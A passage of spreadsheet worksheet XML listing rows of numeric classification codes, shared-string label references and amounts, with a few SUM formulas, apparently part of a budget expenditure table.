        <v>0</v>
      </c>
    </row>
    <row r="315" ht="17.1" customHeight="1" spans="1:3">
      <c r="A315" s="705">
        <v>2040299</v>
      </c>
      <c r="B315" s="705" t="s">
        <v>1149</v>
      </c>
      <c r="C315" s="707">
        <v>380</v>
      </c>
    </row>
    <row r="316" ht="17.1" customHeight="1" spans="1:3">
      <c r="A316" s="705">
        <v>20403</v>
      </c>
      <c r="B316" s="706" t="s">
        <v>1150</v>
      </c>
      <c r="C316" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="17.1" customHeight="1" spans="1:3">
      <c r="A317" s="705">
        <v>2040301</v>
      </c>
      <c r="B317" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C317" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="17.1" customHeight="1" spans="1:3">
      <c r="A318" s="705">
        <v>2040302</v>
      </c>
      <c r="B318" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C318" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="17.1" customHeight="1" spans="1:3">
      <c r="A319" s="705">
        <v>2040303</v>
      </c>
      <c r="B319" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C319" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="17.1" customHeight="1" spans="1:3">
      <c r="A320" s="705">
        <v>2040304</v>
      </c>
      <c r="B320" s="705" t="s">
        <v>1151</v>
      </c>
      <c r="C320" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="17.1" customHeight="1" spans="1:3">
      <c r="A321" s="705">
        <v>2040350</v>
      </c>
      <c r="B321" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C321" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="17.1" customHeight="1" spans="1:3">
      <c r="A322" s="705">
        <v>2040399</v>
      </c>
      <c r="B322" s="705" t="s">
        <v>1152</v>
      </c>
      <c r="C322" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="17.1" customHeight="1" spans="1:3">
      <c r="A323" s="705">
        <v>20404</v>
      </c>
      <c r="B323" s="706" t="s">
        <v>1153</v>
      </c>
      <c r="C323" s="269">
        <v>12</v>
      </c>
    </row>
    <row r="324" ht="17.1" customHeight="1" spans="1:3">
      <c r="A324" s="705">
        <v>2040401</v>
      </c>
      <c r="B324" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C324" s="707">
        <v>12</v>
      </c>
    </row>
    <row r="325" ht="17.1" customHeight="1" spans="1:3">
      <c r="A325" s="705">
        <v>2040402</v>
      </c>
      <c r="B325" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C325" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="17.1" customHeight="1" spans="1:3">
      <c r="A326" s="705">
        <v>2040403</v>
      </c>
      <c r="B326" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C326" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="17.1" customHeight="1" spans="1:3">
      <c r="A327" s="705">
        <v>2040409</v>
      </c>
      <c r="B327" s="705" t="s">
        <v>1154</v>
      </c>
      <c r="C327" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="17.1" customHeight="1" spans="1:3">
      <c r="A328" s="705">
        <v>2040410</v>
      </c>
      <c r="B328" s="705" t="s">
        <v>1155</v>
      </c>
      <c r="C328" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="17.1" customHeight="1" spans="1:3">
      <c r="A329" s="705">
        <v>2040450</v>
      </c>
      <c r="B329" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C329" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="17.1" customHeight="1" spans="1:3">
      <c r="A330" s="705">
        <v>2040499</v>
      </c>
      <c r="B330" s="705" t="s">
        <v>1156</v>
      </c>
      <c r="C330" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="17.1" customHeight="1" spans="1:3">
      <c r="A331" s="705">
        <v>20405</v>
      </c>
      <c r="B331" s="706" t="s">
        <v>1157</v>
      </c>
      <c r="C331" s="269">
        <f>SUM(C332:C339)</f>
        <v>439</v>
      </c>
    </row>
    <row r="332" ht="17.1" customHeight="1" spans="1:3">
      <c r="A332" s="705">
        <v>2040501</v>
      </c>
      <c r="B332" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C332" s="707">
        <v>396</v>
      </c>
    </row>
    <row r="333" ht="17.1" customHeight="1" spans="1:3">
      <c r="A333" s="705">
        <v>2040502</v>
      </c>
      <c r="B333" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C333" s="707">
        <v>43</v>
      </c>
    </row>
    <row r="334" ht="17.1" customHeight="1" spans="1:3">
      <c r="A334" s="705">
        <v>2040503</v>
      </c>
      <c r="B334" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C334" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="17.1" customHeight="1" spans="1:3">
      <c r="A335" s="705">
        <v>2040504</v>
      </c>
      <c r="B335" s="705" t="s">
        <v>1158</v>
      </c>
      <c r="C335" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="17.1" customHeight="1" spans="1:3">
      <c r="A336" s="705">
        <v>2040505</v>
      </c>
      <c r="B336" s="705" t="s">
        <v>1159</v>
      </c>
      <c r="C336" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="17.1" customHeight="1" spans="1:3">
      <c r="A337" s="705">
        <v>2040506</v>
      </c>
      <c r="B337" s="705" t="s">
        <v>1160</v>
      </c>
      <c r="C337" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="17.1" customHeight="1" spans="1:3">
      <c r="A338" s="705">
        <v>2040550</v>
      </c>
      <c r="B338" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C338" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="17.1" customHeight="1" spans="1:3">
      <c r="A339" s="705">
        <v>2040599</v>
      </c>
      <c r="B339" s="705" t="s">
        <v>1161</v>
      </c>
      <c r="C339" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="17.1" customHeight="1" spans="1:3">
      <c r="A340" s="705">
        <v>20406</v>
      </c>
      <c r="B340" s="706" t="s">
        <v>1162</v>
      </c>
      <c r="C340" s="269">
        <f>SUM(C341:C353)</f>
        <v>1087</v>
      </c>
    </row>
    <row r="341" ht="17.1" customHeight="1" spans="1:3">
      <c r="A341" s="705">
        <v>2040601</v>
      </c>
      <c r="B341" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C341" s="707">
        <v>986</v>
      </c>
    </row>
    <row r="342" ht="17.1" customHeight="1" spans="1:3">
      <c r="A342" s="705">
        <v>2040602</v>
      </c>
      <c r="B342" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C342" s="707">
        <v>34</v>
      </c>
    </row>
    <row r="343" ht="17.1" customHeight="1" spans="1:3">
      <c r="A343" s="705">
        <v>2040603</v>
      </c>
      <c r="B343" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C343" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="344" ht="17.1" customHeight="1" spans="1:3">
      <c r="A344" s="705">
        <v>2040604</v>
      </c>
      <c r="B344" s="705" t="s">
        <v>1163</v>
      </c>
      <c r="C344" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="345" ht="17.1" customHeight="1" spans="1:3">
      <c r="A345" s="705">
        <v>2040605</v>
      </c>
      <c r="B345" s="705" t="s">
        <v>1164</v>
      </c>
      <c r="C345" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="346" ht="17.1" customHeight="1" spans="1:3">
      <c r="A346" s="705">
        <v>2040606</v>
      </c>
      <c r="B346" s="705" t="s">
        <v>1165</v>
      </c>
      <c r="C346" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="347" ht="17.1" customHeight="1" spans="1:3">
      <c r="A347" s="705">
        <v>2040607</v>
      </c>
      <c r="B347" s="705" t="s">
        <v>1166</v>
      </c>
      <c r="C347" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="348" ht="17.1" customHeight="1" spans="1:3">
      <c r="A348" s="705">
        <v>2040608</v>
      </c>
      <c r="B348" s="705" t="s">
        <v>1167</v>
      </c>
      <c r="C348" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="349" ht="17.1" customHeight="1" spans="1:3">
      <c r="A349" s="705">
        <v>2040610</v>
      </c>
      <c r="B349" s="705" t="s">
        <v>1168</v>
      </c>
      <c r="C349" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="350" ht="17.1" customHeight="1" spans="1:3">
      <c r="A350" s="705">
        <v>2040612</v>
      </c>
      <c r="B350" s="705" t="s">
        <v>1169</v>
      </c>
      <c r="C350" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="351" ht="17.1" customHeight="1" spans="1:3">
      <c r="A351" s="705">
        <v>2040613</v>
      </c>
      <c r="B351" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C351" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="352" ht="17.1" customHeight="1" spans="1:3">
      <c r="A352" s="705">
        <v>2040650</v>
      </c>
      <c r="B352" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C352" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="17.1" customHeight="1" spans="1:3">
      <c r="A353" s="705">
        <v>2040699</v>
      </c>
      <c r="B353" s="705" t="s">
        <v>1170</v>
      </c>
      <c r="C353" s="707">
        <v>67</v>
      </c>
    </row>
    <row r="354" ht="17.1" customHeight="1" spans="1:3">
      <c r="A354" s="705">
        <v>20407</v>
      </c>
      <c r="B354" s="706" t="s">
        <v>1171</v>
      </c>
      <c r="C354" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="17.1" customHeight="1" spans="1:3">
      <c r="A355" s="705">
        <v>2040701</v>
      </c>
      <c r="B355" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C355" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="17.1" customHeight="1" spans="1:3">
      <c r="A356" s="705">
        <v>2040702</v>
      </c>
      <c r="B356" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C356" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="17.1" customHeight="1" spans="1:3">
      <c r="A357" s="705">
        <v>2040703</v>
      </c>
      <c r="B357" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C357" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="17.1" customHeight="1" spans="1:3">
      <c r="A358" s="705">
        <v>2040704</v>
      </c>
      <c r="B358" s="705" t="s">
        <v>1172</v>
      </c>
      <c r="C358" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="17.1" customHeight="1" spans="1:3">
      <c r="A359" s="705">
        <v>2040705</v>
      </c>
      <c r="B359" s="705" t="s">
        <v>1173</v>
      </c>
      <c r="C359" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="17.1" customHeight="1" spans="1:3">
      <c r="A360" s="705">
        <v>2040706</v>
      </c>
      <c r="B360" s="705" t="s">
        <v>1174</v>
      </c>
      <c r="C360" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="17.1" customHeight="1" spans="1:3">
      <c r="A361" s="705">
        <v>2040707</v>
      </c>
      <c r="B361" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C361" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="17.1" customHeight="1" spans="1:3">
      <c r="A362" s="705">
        <v>2040750</v>
      </c>
      <c r="B362" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C362" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="17.1" customHeight="1" spans="1:3">
      <c r="A363" s="705">
        <v>2040799</v>
      </c>
      <c r="B363" s="705" t="s">
        <v>1175</v>
      </c>
      <c r="C363" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="17.1" customHeight="1" spans="1:3">
      <c r="A364" s="705">
        <v>20408</v>
      </c>
      <c r="B364" s="706" t="s">
        <v>1176</v>
      </c>
      <c r="C364" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="17.1" customHeight="1" spans="1:3">
      <c r="A365" s="705">
        <v>2040801</v>
      </c>
      <c r="B365" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C365" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="17.1" customHeight="1" spans="1:3">
      <c r="A366" s="705">
        <v>2040802</v>
      </c>
      <c r="B366" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C366" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="17.1" customHeight="1" spans="1:3">
      <c r="A367" s="705">
        <v>2040803</v>
      </c>
      <c r="B367" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C367" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="17.1" customHeight="1" spans="1:3">
      <c r="A368" s="705">
        <v>2040804</v>
      </c>
      <c r="B368" s="705" t="s">
        <v>1177</v>
      </c>
      <c r="C368" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="17.1" customHeight="1" spans="1:3">
      <c r="A369" s="705">
        <v>2040805</v>
      </c>
      <c r="B369" s="705" t="s">
        <v>1178</v>
      </c>
      <c r="C369" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="17.1" customHeight="1" spans="1:3">
      <c r="A370" s="705">
        <v>2040806</v>
      </c>
      <c r="B370" s="705" t="s">
        <v>1179</v>
      </c>
      <c r="C370" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="17.1" customHeight="1" spans="1:3">
      <c r="A371" s="705">
        <v>2040807</v>
      </c>
      <c r="B371" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C371" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="17.1" customHeight="1" spans="1:3">
      <c r="A372" s="705">
        <v>2040850</v>
      </c>
      <c r="B372" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C372" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="373" ht="17.1" customHeight="1" spans="1:3">
      <c r="A373" s="705">
        <v>2040899</v>
      </c>
      <c r="B373" s="705" t="s">
        <v>1180</v>
      </c>
      <c r="C373" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="374" ht="17.1" customHeight="1" spans="1:3">
      <c r="A374" s="705">
        <v>20409</v>
      </c>
      <c r="B374" s="706" t="s">
        <v>1181</v>
      </c>
      <c r="C374" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="17.1" customHeight="1" spans="1:3">
      <c r="A375" s="705">
        <v>2040901</v>
      </c>
      <c r="B375" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C375" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="376" ht="17.1" customHeight="1" spans="1:3">
      <c r="A376" s="705">
        <v>2040902</v>
      </c>
      <c r="B376" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C376" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="17.1" customHeight="1" spans="1:3">
      <c r="A377" s="705">
        <v>2040903</v>
      </c>
      <c r="B377" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C377" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="17.1" customHeight="1" spans="1:3">
      <c r="A378" s="705">
        <v>2040904</v>
      </c>
      <c r="B378" s="705" t="s">
        <v>1182</v>
      </c>
      <c r="C378" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="17.1" customHeight="1" spans="1:3">
      <c r="A379" s="705">
        <v>2040905</v>
      </c>
      <c r="B379" s="705" t="s">
        <v>1183</v>
      </c>
      <c r="C379" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="17.1" customHeight="1" spans="1:3">
      <c r="A380" s="705">
        <v>2040950</v>
      </c>
      <c r="B380" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C380" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="17.1" customHeight="1" spans="1:3">
      <c r="A381" s="705">
        <v>2040999</v>
      </c>
      <c r="B381" s="705" t="s">
        <v>1184</v>
      </c>
      <c r="C381" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="17.1" customHeight="1" spans="1:3">
      <c r="A382" s="705">
        <v>20410</v>
      </c>
      <c r="B382" s="706" t="s">
        <v>1185</v>
      </c>
      <c r="C382" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="17.1" customHeight="1" spans="1:3">
      <c r="A383" s="705">
        <v>2041001</v>
      </c>
      <c r="B383" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C383" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="17.1" customHeight="1" spans="1:3">
      <c r="A384" s="705">
        <v>2041002</v>
      </c>
      <c r="B384" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C384" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="17.1" customHeight="1" spans="1:3">
      <c r="A385" s="705">
        <v>2041006</v>
      </c>
      <c r="B385" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C385" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="17.1" customHeight="1" spans="1:3">
      <c r="A386" s="705">
        <v>2041007</v>
      </c>
      <c r="B386" s="705" t="s">
        <v>1186</v>
      </c>
      <c r="C386" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="17.1" customHeight="1" spans="1:3">
      <c r="A387" s="705">
        <v>2041099</v>
      </c>
      <c r="B387" s="705" t="s">
        <v>1187</v>
      </c>
      <c r="C387" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="17.1" customHeight="1" spans="1:3">
      <c r="A388" s="705">
        <v>20499</v>
      </c>
      <c r="B388" s="706" t="s">
        <v>1188</v>
      </c>
      <c r="C388" s="269">
        <v>15</v>
      </c>
    </row>
    <row r="389" ht="17.1" customHeight="1" spans="1:3">
      <c r="A389" s="705">
        <v>2049902</v>
      </c>
      <c r="B389" s="705" t="s">
        <v>1189</v>
      </c>
      <c r="C389" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="17.1" customHeight="1" spans="1:3">
      <c r="A390" s="705">
        <v>2049999</v>
      </c>
      <c r="B390" s="705" t="s">
        <v>1190</v>
      </c>
      <c r="C390" s="707">
        <v>15</v>
      </c>
    </row>
    <row r="391" ht="17.1" customHeight="1" spans="1:3">
      <c r="A391" s="705">
        <v>205</v>
      </c>
      <c r="B391" s="706" t="s">
        <v>1191</v>
      </c>
      <c r="C391" s="269">
        <v>117310</v>
      </c>
    </row>
    <row r="392" ht="17.1" customHeight="1" spans="1:3">
      <c r="A392" s="705">
        <v>20501</v>
      </c>
      <c r="B392" s="706" t="s">
        <v>1192</v>
      </c>
      <c r="C392" s="269">
        <v>1438</v>
      </c>
    </row>
    <row r="393" ht="17.1" customHeight="1" spans="1:3">
      <c r="A393" s="705">
        <v>2050101</v>
      </c>
      <c r="B393" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C393" s="707">
        <v>1438</v>
      </c>
    </row>
    <row r="394" ht="17.1" customHeight="1" spans="1:3">
      <c r="A394" s="705">
        <v>2050102</v>
      </c>
      <c r="B394" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C394" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="17.1" customHeight="1" spans="1:3">
      <c r="A395" s="705">
        <v>2050103</v>
      </c>
      <c r="B395" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C395" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="17.1" customHeight="1" spans="1:3">
      <c r="A396" s="705">
        <v>2050199</v>
      </c>
      <c r="B396" s="705" t="s">
        <v>1193</v>
      </c>
      <c r="C396" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="17.1" customHeight="1" spans="1:3">
      <c r="A397" s="705">
        <v>20502</v>
      </c>
      <c r="B397" s="706" t="s">
        <v>1194</v>
      </c>
      <c r="C397" s="269">
        <f>SUM(C398:C403)</f>
        <v>104905</v>
      </c>
    </row>
    <row r="398" ht="17.1" customHeight="1" spans="1:3">
      <c r="A398" s="705">
        <v>2050201</v>
      </c>
      <c r="B398" s="705" t="s">
        <v>1195</v>
      </c>
      <c r="C398" s="707">
        <v>6182</v>
      </c>
    </row>
    <row r="399" ht="17.1" customHeight="1" spans="1:3">
      <c r="A399" s="705">
        <v>2050202</v>
      </c>
      <c r="B399" s="705" t="s">
        <v>1196</v>
      </c>
      <c r="C399" s="707">
        <v>14880</v>
      </c>
    </row>
    <row r="400" ht="17.1" customHeight="1" spans="1:3">
      <c r="A400" s="705">
        <v>2050203</v>
      </c>
      <c r="B400" s="705" t="s">
        <v>1197</v>
      </c>
      <c r="C400" s="707">
        <v>67679</v>
      </c>
    </row>
    <row r="401" ht="17.1" customHeight="1" spans="1:3">
      <c r="A401" s="705">
        <v>2050204</v>
      </c>
      <c r="B401" s="705" t="s">
        <v>1198</v>
      </c>
      <c r="C401" s="707">
        <v>14350</v>
      </c>
    </row>
    <row r="402" ht="17.1" customHeight="1" spans="1:3">
      <c r="A402" s="705">
        <v>2050205</v>
      </c>
      <c r="B402" s="705" t="s">
        <v>1199</v>
      </c>
      <c r="C402" s="707">
        <v>84</v>
      </c>
    </row>
    <row r="403" ht="17.1" customHeight="1" spans="1:3">
      <c r="A403" s="705">
        <v>2050299</v>
      </c>
      <c r="B403" s="705" t="s">
        <v>1200</v>
      </c>
      <c r="C403" s="707">
        <v>1730</v>
      </c>
    </row>
    <row r="404" ht="17.1" customHeight="1" spans="1:3">
      <c r="A404" s="705">
        <v>20503</v>
      </c>
      <c r="B404" s="706" t="s">
        <v>1201</v>
      </c>
      <c r="C404" s="269">
        <v>5655</v>
      </c>
    </row>
    <row r="405" ht="17.1" customHeight="1" spans="1:3">
      <c r="A405" s="705">
        <v>2050301</v>
      </c>
      <c r="B405" s="705" t="s">
        <v>1202</v>
      </c>
      <c r="C405" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="406" ht="17.1" customHeight="1" spans="1:3">
      <c r="A406" s="705">
        <v>2050302</v>
      </c>
      <c r="B406" s="705" t="s">
        <v>1203</v>
      </c>
      <c r="C406" s="707">
        <v>5655</v>
      </c>
    </row>
    <row r="407" ht="17.1" customHeight="1" spans="1:3">
      <c r="A407" s="705">
        <v>2050303</v>
      </c>
      <c r="B407" s="705" t="s">
        <v>1204</v>
      </c>
      <c r="C407" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="408" ht="17.1" customHeight="1" spans="1:3">
      <c r="A408" s="705">
        <v>2050305</v>
      </c>
      <c r="B408" s="705" t="s">
        <v>1205</v>
      </c>
      <c r="C408" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="409" ht="17.1" customHeight="1" spans="1:3">
      <c r="A409" s="705">
        <v>2050399</v>
      </c>
      <c r="B409" s="705" t="s">
        <v>1206</v>
      </c>
      <c r="C409" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="410" ht="17.1" customHeight="1" spans="1:3">
      <c r="A410" s="705">
        <v>20504</v>
      </c>
      <c r="B410" s="706" t="s">
        <v>1207</v>
      </c>
      <c r="C410" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="411" ht="17.1" customHeight="1" spans="1:3">
      <c r="A411" s="705">
        <v>2050401</v>
      </c>
      <c r="B411" s="705" t="s">
        <v>1208</v>
      </c>
      <c r="C411" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="412" ht="17.1" customHeight="1" spans="1:3">
      <c r="A412" s="705">
        <v>2050402</v>
      </c>
      <c r="B412" s="705" t="s">
        <v>1209</v>
      </c>
      <c r="C412" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="413" ht="17.1" customHeight="1" spans="1:3">
      <c r="A413" s="705">
        <v>2050403</v>
      </c>
      <c r="B413" s="705" t="s">
        <v>1210</v>
      </c>
      <c r="C413" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="17.1" customHeight="1" spans="1:3">
      <c r="A414" s="705">
        <v>2050404</v>
      </c>
      <c r="B414" s="705" t="s">
        <v>1211</v>
      </c>
      <c r="C414" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="17.1" customHeight="1" spans="1:3">
      <c r="A415" s="705">
        <v>2050499</v>
      </c>
      <c r="B415" s="705" t="s">
        <v>1212</v>
      </c>
      <c r="C415" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="17.1" customHeight="1" spans="1:3">
      <c r="A416" s="705">
        <v>20505</v>
      </c>
      <c r="B416" s="706" t="s">
        <v>1213</v>
      </c>
      <c r="C416" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="17.1" customHeight="1" spans="1:3">
      <c r="A417" s="705">
        <v>2050501</v>
      </c>
      <c r="B417" s="705" t="s">
        <v>1214</v>
      </c>
      <c r="C417" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="17.1" customHeight="1" spans="1:3">
      <c r="A418" s="705">
        <v>2050502</v>
      </c>
      <c r="B418" s="705" t="s">
        <v>1215</v>
      </c>
      <c r="C418" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="17.1" customHeight="1" spans="1:3">
      <c r="A419" s="705">
        <v>2050599</v>
      </c>
      <c r="B419" s="705" t="s">
        <v>1216</v>
      </c>
      <c r="C419" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="17.1" customHeight="1" spans="1:3">
      <c r="A420" s="705">
        <v>20506</v>
      </c>
      <c r="B420" s="706" t="s">
        <v>1217</v>
      </c>
      <c r="C420" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="17.1" customHeight="1" spans="1:3">
      <c r="A421" s="705">
        <v>2050601</v>
      </c>
      <c r="B421" s="705" t="s">
        <v>1218</v>
      </c>
      <c r="C421" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="17.1" customHeight="1" spans="1:3">
      <c r="A422" s="705">
        <v>2050602</v>
      </c>
      <c r="B422" s="705" t="s">
        <v>1219</v>
      </c>
      <c r="C422" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="17.1" customHeight="1" spans="1:3">
      <c r="A423" s="705">
        <v>2050699</v>
      </c>
      <c r="B423" s="705" t="s">
        <v>1220</v>
      </c>
      <c r="C423" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="424" ht="17.1" customHeight="1" spans="1:3">
      <c r="A424" s="705">
        <v>20507</v>
      </c>
      <c r="B424" s="706" t="s">
        <v>1221</v>
      </c>
      <c r="C424" s="269">
        <f>SUM(C425:C427)</f>
        <v>891</v>
      </c>
    </row>
    <row r="425" ht="17.1" customHeight="1" spans="1:3">
      <c r="A425" s="705">
        <v>2050701</v>
      </c>
      <c r="B425" s="705" t="s">
        <v>1222</v>
      </c>
      <c r="C425" s="707">
        <v>876</v>
      </c>
    </row>
    <row r="426" ht="17.1" customHeight="1" spans="1:3">
      <c r="A426" s="705">
        <v>2050702</v>
      </c>
      <c r="B426" s="705" t="s">
        <v>1223</v>
      </c>
      <c r="C426" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="17.1" customHeight="1" spans="1:3">
      <c r="A427" s="705">
        <v>2050799</v>
      </c>
      <c r="B427" s="705" t="s">
        <v>1224</v>
      </c>
      <c r="C427" s="707">
        <v>15</v>
      </c>
    </row>
    <row r="428" ht="17.1" customHeight="1" spans="1:3">
      <c r="A428" s="705">
        <v>20508</v>
      </c>
      <c r="B428" s="706" t="s">
        <v>1225</v>
      </c>
      <c r="C428" s="269">
        <v>395</v>
      </c>
    </row>
    <row r="429" ht="17.1" customHeight="1" spans="1:3">
      <c r="A429" s="705">
        <v>2050801</v>
      </c>
      <c r="B429" s="705" t="s">
        <v>1226</v>
      </c>
      <c r="C429" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="17.1" customHeight="1" spans="1:3">
      <c r="A430" s="705">
        <v>2050802</v>
      </c>
      <c r="B430" s="705" t="s">
        <v>1227</v>
      </c>
      <c r="C430" s="707">
        <v>395</v>
      </c>
    </row>
    <row r="431" ht="17.1" customHeight="1" spans="1:3">
      <c r="A431" s="705">
        <v>2050803</v>
      </c>
      <c r="B431" s="705" t="s">
        <v>1228</v>
      </c>
      <c r="C431" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="432" ht="17.1" customHeight="1" spans="1:3">
      <c r="A432" s="705">
        <v>2050804</v>
      </c>
      <c r="B432" s="705" t="s">
        <v>1229</v>
      </c>
      <c r="C432" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="433" ht="17.1" customHeight="1" spans="1:3">
      <c r="A433" s="705">
        <v>2050899</v>
      </c>
      <c r="B433" s="705" t="s">
        <v>1230</v>
      </c>
      <c r="C433" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="434" ht="17.1" customHeight="1" spans="1:3">
      <c r="A434" s="705">
        <v>20509</v>
      </c>
      <c r="B434" s="706" t="s">
        <v>1231</v>
      </c>
      <c r="C434" s="269">
        <v>2533</v>
      </c>
    </row>
    <row r="435" ht="17.1" customHeight="1" spans="1:3">
      <c r="A435" s="705">
        <v>2050901</v>
      </c>
      <c r="B435" s="705" t="s">
        <v>1232</v>
      </c>
      <c r="C435" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="436" ht="17.1" customHeight="1" spans="1:3">
      <c r="A436" s="705">
        <v>2050902</v>
      </c>
      <c r="B436" s="705" t="s">
        <v>1233</v>
      </c>
      <c r="C436" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="437" ht="17.1" customHeight="1" spans="1:3">
      <c r="A437" s="705">
        <v>2050903</v>
      </c>
